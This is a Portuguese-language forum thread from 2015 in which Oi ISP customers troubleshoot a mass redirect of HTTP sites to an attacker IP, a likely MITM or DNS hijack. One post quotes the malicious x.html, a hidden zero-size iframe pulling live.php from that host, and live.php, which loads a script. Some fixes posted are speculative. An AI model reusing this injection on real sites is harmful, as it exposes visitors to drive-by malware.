Alguem notou isso que quando entre em site que nao são https ele é redirecionado para este site http://66.228.60.253/x.html , mudei dns , e nada .
Versão Imprimível
Alguem notou isso que quando entre em site que nao são https ele é redirecionado para este site http://66.228.60.253/x.html , mudei dns , e nada .
Está acontecendo com uma quantidade imensa de pessoas. Estou na mesma situação. Estranho o fato de ser um vírus, tendo infectado instantaneamente tantos computadores. Talvez alguma invasão DNS. Esperar alguém solucionar isso.
Aqui em casa começou a acontecer isto também às 21h50min !!
legal saber que mais pessoas estão passando por este problema, pensei que era vírus em meu computador.
Olha de fato é algo que está afetando muitas pessoas pois o trafego do site duplicou so por conta deste topico.
Direciona pro Linode da Level3
Segue resultado do THREAT STOP
Dig info from google DNS ; <<>> DiG 9.9.5-3ubuntu0.4-Ubuntu <<>> @8.8.4.4 -x 66.228.60.253; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25652;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 512;; QUESTION SECTION:;253.60.228.66.in-addr.arpa. IN PTR;; ANSWER SECTION:253.60.228.66.in-addr.arpa. 15550 IN PTR li317-253.members.linode.com.;; Query time: 32 msec;; SERVER: 8.8.4.4#53(8.8.4.4);; WHEN: Thu Aug 13 01:06:16 UTC 2015;; MSG SIZE rcvd: 97
Talvez exista alguma relação entre as máquinas "infectadas". Segue algumas coisas que talvez sejam genéricas a nós:
- Estou em Pernambuco;
- Meu Windows Defender parou de funcionar hoje;
- Acessei um link do Linkedin hj de um spam que recebi no e-mail (tenho certeza que era o domínio original), mas que o Avast detectou como vírus ao redirecionar pra algum outro lugar;
Olá Anderson e demais:
- Estou em Minas Gerais (Itajubá - Sul de Minas)
- Uso o MCAFEE licensa original
- Estava acessando um blog de um indiano sobre mercado de ações
acho que realmente deve ser um problema na rede da OI como os demais usuários postaram anteriormente.
Eu resolvi o meu assim:
Meu DNS configurado no roteador wifi era do OPEN DNS e o da google.
Mudei pro da oi RJ: 200.149.55.142. Só por precaução, mudei na minha conexão do PC tb.
Dei um ipconfig /flushdns no prompt de comando do Windows pra limpar as tabelas de dns.
Dei uma limpada nos temporários dos navegadores e cache/etc.
Daí voltou a funcionar normal. Não sei se era problema no open dns...
Aqui estou com Open DNS tbm. Tentarei mudar o DNS.
Só não esquece de dar um flush no dns.
Itajá, Itarumã, Lagoa Santa em Goiás 4 links da Oi e em Paranaíba-MS 1 link da Algar. Sem nenhum problema, nenhuma reclamação, nem mesmo lentidão.
Possuo o mesmo problema, sou do Rio de Janeiro. Eu restaurei na parte da tarde o roteador para os padrões de fábrica porém algumas horas depois o problema retornou.
Prezados, Algum roteador do Backbone da OI foi interceptado (Men In The Middle), A OI ja solucionou o problema, sendo que é necessário uma limpeza do cache do navegador.
Prezados, Algum roteador do Backbone da OI foi interceptado (Men In The Middle), A OI ja solucionou o problema, sendo que é necessário uma limpeza do cache do navegador.
Troquei pra o DNS da OI RJ (200.149.55.142 e 200.165.132.148), dei o "ipconfig /flushdns" no prompt, e aparentemente funcionou. No caso, o problema é na Open DNS, que estava aqui?
O que me pareceu estranho em ser problema externo, é que o site antes carregava, só que rapidamente o código fonte é trocado por um iframe e nesse iframe é que tem esse http://66.228.60.253.
Alguém tem ideia então? Já que se fosse problema externo, era pra se quer carregar algo, já redirecionar direto no server e não na máquina (front).
Imaginava que minha solução não seria o problema...
Enfim, pelo menos agora tá resolvido.
Liguei pra OI e eles nem sabiam explicar o que tava acontecendo. Atendimento lixoso. Pedi pra entrar em contato com o avançado e ninguem queria resolver ou procurar resolver o problema... queriam me forçar a um tal de manutenção remota.
Eles não iriam saber informar mesmo. A equipe de suporte a backbone só empresas grandes conseguem contato.
Aqui em SC agora esta meio normal alguns sites ainda redirecionam para este site sitado , mais o problema não era de dns , mudei para varios limpava o cache e nada mesma coisa , não sou especialista mais me pareceu uma invação no sistema da OI mesmo , tentei contato mais tambem nao consegui respostas , agora as 22:30Hs a maioria dos sites estão normais , LOUCURA PURAAAAAaaaaaaa
Anderson631, tudo indica que o roteamento da OI foi alterado, fazendo com que os usuários fossem redirecionados para http://66.228.60.253/x.html, não posso afirmar que as informações foram capturadas, mas eu não descartaria essa possibilidade. Pois redirecionando para um DNS envenenado é possível entregar paginas falsas de banco, por exemplo.
Alguem enviou esse link mas nao entendi ainda como foi que tudo isso comecou...
https://www.youtube.com/watch?v=J5t--x4XXE4
O problema não foi na Oi, ou ao menos não foi apenas nela.
Há relatos em sites estrangeiros do mesmo problema acontecendo, como esse: https://www.ponychan.net/oat/res/40288926.html
De qualquer forma, parece que já foi resolvido e tudo que resta de problema é cache da infecção.
tudo indica que o roteamento da OI foi alterado, fazendo com que os usuários fossem redirecionados para http://66.228.60.253/x.html, não posso afirmar que as informações foram capturadas, mas eu não descartaria essa possibilidade. Pois redirecionando para um DNS envenenado é possível entregar paginas falsas de banco, por exemplo.
Amigo, A OI tem Backbone (internacional), são cabos submarinos da Globenet, subsidiária da Oi. A Globenet possui um duplo anel submarino com 22 mil km de extensão, ligando o Brasil aos EUA, passando pela Venezuela, Colômbia e Bermudas.
Também estou com esse problema, começou por volta das 20h00.
Com toda certeza é um ataque hacker, provavelmente ação para roubo de informações bancarias.
Tenha cuidado com o site que você acessa, evite acessar o site do seu banco até o problema ser resolvido, aparentemente isso já tinha acontecido mês passado(não tão grande quanto dessa vez) e segundo um técnico da lista [caiu] provavelmente eram hackers.
Pra quem tiver interesse:
https://eng.registro.br/pipermail/gt...ay/055305.html
https://eng.registro.br/pipermail/ca...st/044414.html
Galera, perdoem a minha ignorância. Mas se o ataque é no backbone, trocando o servidor DNS, não era pra assim que digitasse o domínio, retornasse diretamente o conteúdo diferente?
E pq só existe o redirecionamento, após a página carregar? Inclusive se apertar ESC bem rápido, é possível ver a página original. Ou seja, é como a alteração fosse feita na própria máquina e não na nuvem.
Consegui descobrir algo... O DNS alterado "parece" ter sido do endereço do "http://www.google-analytics.com/analytics.js". Logo, 99% dos sites deve tê-lo. E oq retornava era um JS que alterava o conteúdo da página por um iframe, como eu já tinha mencionado.
Ainda não confirmado se foi totalmente assim.
Na verdade isso é um java script que ta encoded
cat x.html
<iframe style="position: absolute; left: 0px; top: 0px; width: 0px; height: 0px; z-index: 0;" name="analytics" src="http://66.228.60.253/live.php" frameborder="0" width="0" height="0"></iframe><meta charset="utf-8">
cat live.php
68281<html> <head> <script src="1.js"> </script> </head><body></body></html>
eu tambem baixei o 1.js
e estou colocando em anexo caso alguem esteja curioso
Aparentemente o site caiu, pelo menos aqui.
Qualquer pagina não https que eu tente abrir ainda vai redirecionar para o 66.228.60.253, porém a pagina não está mais carregando.
Galera isso é muito simples de resolver, apague todo o histórico do navegador
que o problema vai ser Resolvido, para ter certeza apague os arquivos temporários do windows também,
no navegador vai em Limpar Histórico, e no windows vai C:\Windows\Temp
e pague todos os arquivos que tiver dentro da pasta.
e depois agradece.
Galera isso é muito simples de resolver, apague todo o histórico do navegador
que o problema vai ser Resolvido, para ter certeza apague os arquivos temporários do windows também,
no navegador vai em Limpar Histórico, e no windows vai C:\Windows\Temp
e pague todos os arquivos que tiver dentro da pasta.
Olá, sou de Itambacuri/MG, cliente Oi 10MB.
Percebi este problema hoje pela manhã, e acontece o seguinte:
Site carrega depois é redirecionado para o dito IP, pedi para dar login no roteador e o meu antivírus (ESET/NOD32 Smart Security) apita bloqueando uma IP contendo um JS.
Agora a noite, a situação mudou ao acessar alguns sites: Invés de ir direto para o tal IP, ele está carregando o site e depois é redirecionado para o IP.
aqui também esta acontecendo isso
Pessoal, seguinte:
Aqui também tá acontecendo isso. Rio de Janeiro, Oi Fibra.
Eu havia mudado o DNS do roteador pro OpenDNS ontem e começou a dar esse problema hoje, daí pra ficar tranquilo, mudei pro DNS do Google e mesmo assim, continua o problema. Creio ser mesmo um ataque man-in-the-middle na rede da Oi. Todos os meus computadores estão com o mesmo problema de redirecionar pra esse endereço IP.
gente é só fazer o que eu estou falando Galera isso é muito simples de resolver, apague todo o histórico do navegador
que o problema vai ser Resolvido, para ter certeza apague os arquivos temporários do windows também,
no navegador vai em Limpar Histórico, e no windows vai C:\Windows\Temp
e pague todos os arquivos que tiver dentro da pasta.
Caro wenderson , o ocorrido não tinha nada a ver com os pcs , aconteceu em um monte de gente ao mesmo tempo , como pelo menos aqui se resolveu tambem sem precisar fazer nada .
Agora perto das 09:40 , começou de novo , sem explicação , que merda não a OI ta toda bichada asdahsduahsudahushd , so em sites sem criptografia que esta dando isso , os https: funcionando normal
meu querido isso se trata de um virus que infectou a rede primeiro faça o procedimento depois você posta os resultados simples assim o virus fica nos arquivos temporários do navegador
Venho acompanhando o tópico desde ontem. Aqui tenho uma Oi 10Mb também, e não percebi esse problema nem ontem, nem hoje.
Sou do RS. Tem alguém do RS que teve esse problema?